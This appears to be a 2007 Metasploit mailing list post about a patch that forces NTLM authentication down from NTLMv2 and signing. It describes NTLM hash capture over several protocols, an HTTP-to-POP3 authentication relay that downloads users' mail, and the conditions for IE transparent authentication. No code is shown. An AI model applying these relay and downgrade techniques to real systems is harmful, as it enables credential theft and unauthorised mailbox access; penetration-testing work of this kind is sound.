Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Windows Transparent Authentication updates

From: grutz at jingojango.net (Kurt Grutzmacher)
Date: Fri, 16 Nov 2007 09:44:33 -0600
Yesterday I submitted ticket #169 to update the NTLMSSP type code
support in proto/smb/ui.rb. It adds a function to force negotiation away
from NTLMv2 and signing as well as use bitmasking.

This now makes it possible to support things like NTLM hash capturing
with a predefined nonce over HTTP, IMAP, POP3, or NNTP. I've not written
any auxiliary/exploit modules for this yet mostly due to lack of time
but I do have code available:

http://grutz.jingojango.net/exploits/pokehashball.html

I've also coded up a protocol proxy that will take the authentication
messages from HTTP and relay them between a POP3 server to download all
available mail for a user. It's very brute-force at the moment but it
does work. If I get some time to complete the entire tool I have in my
head it'll include HTTP and IMAP proxying and more intelligent support
for holding on to the browser and requesting authentication at-will.

Check out Rsnake's blog on an idea to use DNS Pinning to fake out IE's trust zone -
http://ha.ckers.org/blog/20071112/effects-of-dns-rebinding-on-ies-trust-zones/

Very interesting theory but not sure it'll work that well given you need
a very specific set of circumstances for transparent authentication to
work in IE:

1. URL must be an internal IP address or hostname (no FQDN)
2. Server must send the correct domain workstation is a member of
3. Server must not be accessed via the proxy

That kind of limits attacks from the Internet for a large majority of
locations but doesn't make it impossible. I'm excited!

If anyone has any activex code that could turn a browser into a usable
proxy however... let me know. Half the battle with transparent auth is
getting the browser to think it's talking to a "Trusted Intranet"
computer. Having a machine on the inside is easiest so this attack is
best served when you're on-site doing a penetration test.

So, enjoy! If you want to give a hand on writing some usable modules or
expanding the exitsing project let me know.

-- 
                 ..:[ grutz at jingojango dot net ]:..
     GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
        "There's just no amusing way to say, 'I have a CISSP'."
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 191 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20071116/f14de553/attachment.pgp>
Previous By Date Next
Previous By Thread Next

Current thread: